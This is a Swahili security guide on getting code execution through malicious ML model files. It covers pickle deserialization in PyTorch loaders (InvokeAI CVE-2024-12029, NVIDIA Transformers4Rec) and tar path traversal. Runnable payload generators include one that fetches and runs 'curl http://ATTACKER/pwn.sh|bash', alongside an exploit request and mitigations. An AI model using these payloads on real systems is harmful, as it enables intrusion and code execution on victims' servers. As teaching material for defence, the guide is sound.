RCE za Modeli

Reading time: 11 minutes

Kupakia modeli kwa RCE

Modeli za Machine Learning kwa kawaida zinashirikiwa katika muundo tofauti, kama ONNX, TensorFlow, PyTorch, n.k. Modeli hizi zinaweza kupakiwa kwenye mashine za watengenezaji au mifumo ya uzalishaji ili kuzitumia. Kawaida modeli hazipaswi kuwa na code hasidi, lakini kuna baadhi ya kesi ambapo modeli inaweza kutumiwa kutekeleza code yoyote kwenye mfumo kama kipengele kilichokusudiwa au kwa sababu ya udhaifu katika maktaba ya kupakia modeli.

Wakati wa kuandika, hizi ni mifano ya aina hizi za udhaifu:

Zaidi ya hayo, kuna baadhi ya modeli zinazotegemea python pickle kama zile zinazotumika na PyTorch ambazo zinaweza kutumiwa kutekeleza code yoyote kwenye mfumo ikiwa hazitapakuliwa kwa weights_only=True. Kwa hivyo, modeli yoyote inayotegemea pickle inaweza kuwa nyeti hasa kwa aina hii ya mashambulizi, hata kama hazijaorodheshwa katika jedwali hapo juu.

🆕 InvokeAI RCE via torch.load (CVE-2024-12029)

InvokeAI ni interface maarufu ya open-source ya wavuti kwa Stable-Diffusion. Matoleo 5.3.1 – 5.4.2 yanaonyesha endpoint ya REST /api/v2/models/install inayomruhusu mtumiaji kupakua na kupakia modeli kutoka kwenye URL yoyote.

Kimsingi endpoint hatimaye inaita:

checkpoint = torch.load(path, map_location=torch.device("meta"))

Wakati faili iliyotolewa ni PyTorch checkpoint (*.ckpt), torch.load hufanya pickle deserialization. Kwa sababu maudhui yanatoka moja kwa moja kutoka kwenye URL inayodhibitiwa na mtumiaji, mshambuliaji anaweza kuingiza kitu chenye madhara chenye method maalum __reduce__ ndani ya checkpoint; method hiyo inatekelezwa wakati wa deserialization, ikisababisha remote code execution (RCE) kwenye InvokeAI server.

Udhaifu ulipewa CVE-2024-12029 (CVSS 9.8, EPSS 61.17 %).

Exploitation walk-through

1. Tengeneza checkpoint yenye madhara:

# payload_gen.py
import pickle, torch, os

class Payload:
def __reduce__(self):
return (os.system, ("/bin/bash -c 'curl http://ATTACKER/pwn.sh|bash'",))

with open("payload.ckpt", "wb") as f:
pickle.dump(Payload(), f)

2. Endesha payload.ckpt kwenye HTTP server unayoidhibiti (kwa mfano http://ATTACKER/payload.ckpt).
3. Chochea endpoint iliyo dhaifu (no authentication required):

import requests

requests.post(
"http://TARGET:9090/api/v2/models/install",
params={
"source": "http://ATTACKER/payload.ckpt",  # remote model URL
"inplace": "true",                         # write inside models dir
# the dangerous default is scan=false → no AV scan
},
json={},                                         # body can be empty
timeout=5,
)

4. Wakati InvokeAI inapopakua faili inaita torch.load() → gadget ya os.system inaendeshwa na mshambuliaji anapata utekelezaji wa msimbo katika muktadha wa mchakato wa InvokeAI.

Exploit tayari: moduli ya Metasploit exploit/linux/http/invokeai_rce_cve_2024_12029 inaoautomatisha mchakato mzima.

Masharti

• InvokeAI 5.3.1-5.4.2 (scan flag default false)
• /api/v2/models/install inafikika kwa mshambuliaji
• Mchakato una ruhusa za kutekeleza amri za shell

Kupunguza Hatari

• Sasisha hadi InvokeAI ≥ 5.4.3 – patch inaweka scan=True kwa chaguo-msingi na inafanya skanning ya malware kabla ya deserialization.
• Unapopakua checkpoints programmatically tumia torch.load(file, weights_only=True) au helper mpya torch.load_safe.
• Tekeleza allow-lists / signatures kwa vyanzo vya modeli na endesha huduma kwa least-privilege.

⚠️ Kumbuka kwamba kila muundo wa Python unaotegemea pickle (ikiwa ni pamoja na mafaili mengi .pt, .pkl, .ckpt, .pth) ni hatari kwa asili kufanyiwa deserialization kutoka kwa vyanzo visivyoaminika.

Mfano wa kupunguza hatari wa ad-hoc ikiwa lazima uendeleze matoleo ya zamani ya InvokeAI yanayofanya kazi nyuma ya reverse proxy:

location /api/v2/models/install {
deny all;                       # block direct Internet access
allow 10.0.0.0/8;               # only internal CI network can call it
}

🆕 NVIDIA Merlin Transformers4Rec RCE kupitia isiyo salama torch.load (CVE-2025-23298)

Transformers4Rec ya NVIDIA (sehemu ya Merlin) ilifunua loader hatari ya checkpoint ambayo iliita moja kwa moja torch.load() kwa paths zilizotolewa na mtumiaji. Kwa sababu torch.load inategemea Python pickle, checkpoint inayodhibitiwa na mshambulizi inaweza kutekeleza msimbo wowote kupitia reducer wakati wa deserialization.

Njia iliyo na udhaifu (pre-fix): transformers4rec/torch/trainer/trainer.py → load_model_trainer_states_from_checkpoint(...) → torch.load(...).

Kwa nini hili linapelekea RCE: Katika Python pickle, kitu kinaweza kutaja reducer (__reduce__/__setstate__) kinachorejesha callable na vigezo. Callable hiyo inatekelezwa wakati wa unpickling. Ikiwa kitu kama hicho kipo katika checkpoint, kinaendeshwa kabla uzito wowote kutumiwa.

Mfano mdogo wa checkpoint hasidi:

import torch

class Evil:
def __reduce__(self):
import os
return (os.system, ("id > /tmp/pwned",))

# Place the object under a key guaranteed to be deserialized early
ckpt = {
"model_state_dict": Evil(),
"trainer_state": {"epoch": 10},
}

torch.save(ckpt, "malicious.ckpt")

Njia za utoaji na eneo la athari:

• Trojanized checkpoints/models zilizoshirikiwa kupitia repos, buckets, au artifact registries
• Automated resume/deploy pipelines zinazojipakia checkpoints moja kwa moja
• Uendeshaji hufanyika ndani ya training/inference workers, mara nyingi kwa vibali vya juu (mfano, root katika containers)

Suluhisho: Commit b7eaea5 (PR #802) ilibadilisha torch.load() ya moja kwa moja kwa deserializer iliyozuiliwa na iliyowekwa kwenye allow-list iliyotekelezwa katika transformers4rec/utils/serialization.py. Loader mpya inathibitisha types/fields na inazuia arbitrary callables kutiwa ndani wakati wa load.

Mwongozo wa kinga maalum kwa PyTorch checkpoints:

• Usifanye unpickle data isiyoaminika. Tumia zaidi fomati zisizotekelezwa kama Safetensors au ONNX inapowezekana.
• Ikiwa lazima utumie PyTorch serialization, hakikisha weights_only=True (inayoungwa mkono katika PyTorch mpya) au tumia custom allow-listed unpickler sawa na patch ya Transformers4Rec.
• Lazimishe model provenance/signatures na sandbox deserialization (seccomp/AppArmor; non-root user; restricted FS na hakuna network egress).
• Angalia kwa ajili ya unexpected child processes kutoka huduma za ML wakati wa checkpoint load; fuatilia matumizi ya torch.load()/pickle.

POC na marejeo ya vulnerable/patch:

• Vulnerable pre-patch loader: https://gist.github.com/zdi-team/56ad05e8a153c84eb3d742e74400fd10.js
• Malicious checkpoint POC: https://gist.github.com/zdi-team/fde7771bb93ffdab43f15b1ebb85e84f.js
• Post-patch loader: https://gist.github.com/zdi-team/a0648812c52ab43a3ce1b3a090a0b091.js

Mfano – kuunda model hatari ya PyTorch

• Tengeneza model:

# attacker_payload.py
import torch
import os

class MaliciousPayload:
def __reduce__(self):
# This code will be executed when unpickled (e.g., on model.load_state_dict)
return (os.system, ("echo 'You have been hacked!' > /tmp/pwned.txt",))

# Create a fake model state dict with malicious content
malicious_state = {"fc.weight": MaliciousPayload()}

# Save the malicious state dict
torch.save(malicious_state, "malicious_state.pth")

• Pakia modeli:

# victim_load.py
import torch
import torch.nn as nn

class MyModel(nn.Module):
def __init__(self):
super().__init__()
self.fc = nn.Linear(10, 1)

model = MyModel()

# ⚠️ This will trigger code execution from pickle inside the .pth file
model.load_state_dict(torch.load("malicious_state.pth", weights_only=False))

# /tmp/pwned.txt is created even if you get an error

Models to Path Traversal

Kama ilivyotajwa katika this blog post, muundo wa wengi wa models zinazotumiwa na frameworks mbalimbali za AI unategemea archives, kawaida .zip. Kwa hivyo, huenda iwezekane kuabuse format hizi ili kufanya path traversal attacks, na kuruhusu kusoma mafaili yoyote kutoka kwa mfumo ambapo model imepakuliwa.

Kwa mfano, kwa code ifuatayo unaweza kuunda model itakayounda faili katika directory ya /tmp wakati inapopakuliwa:

import tarfile

def escape(member):
member.name = "../../tmp/hacked"     # break out of the extract dir
return member

with tarfile.open("traversal_demo.model", "w:gz") as tf:
tf.add("harmless.txt", filter=escape)

Au, kwa kutumia msimbo ufuatao unaweza kuunda model ambayo itaunda symlink kwa saraka ya /tmp wakati inapoanzishwa:

import tarfile, pathlib

TARGET  = "/tmp"        # where the payload will land
PAYLOAD = "abc/hacked"

def link_it(member):
member.type, member.linkname = tarfile.SYMTYPE, TARGET
return member

with tarfile.open("symlink_demo.model", "w:gz") as tf:
tf.add(pathlib.Path(PAYLOAD).parent, filter=link_it)
tf.add(PAYLOAD)                      # rides the symlink

Uchunguzi wa kina: Keras .keras deserialization and gadget hunting

Kwa mwongozo uliolengwa kuhusu ndani za .keras, Lambda-layer RCE, the arbitrary import issue in ≤ 3.8, na post-fix gadget discovery ndani ya allowlist, angalia:

Keras Model Deserialization Rce And Gadget Hunting

Marejeo

• OffSec blog – "CVE-2024-12029 – InvokeAI Deserialization of Untrusted Data"
• InvokeAI patch commit 756008d
• Rapid7 Metasploit module documentation
• PyTorch – security considerations for torch.load
• ZDI blog – CVE-2025-23298 Getting Remote Code Execution in NVIDIA Merlin
• ZDI advisory: ZDI-25-833
• Transformers4Rec patch commit b7eaea5 (PR #802)
• Pre-patch vulnerable loader (gist)
• Malicious checkpoint PoC (gist)
• Post-patch loader (gist)
• Hugging Face Transformers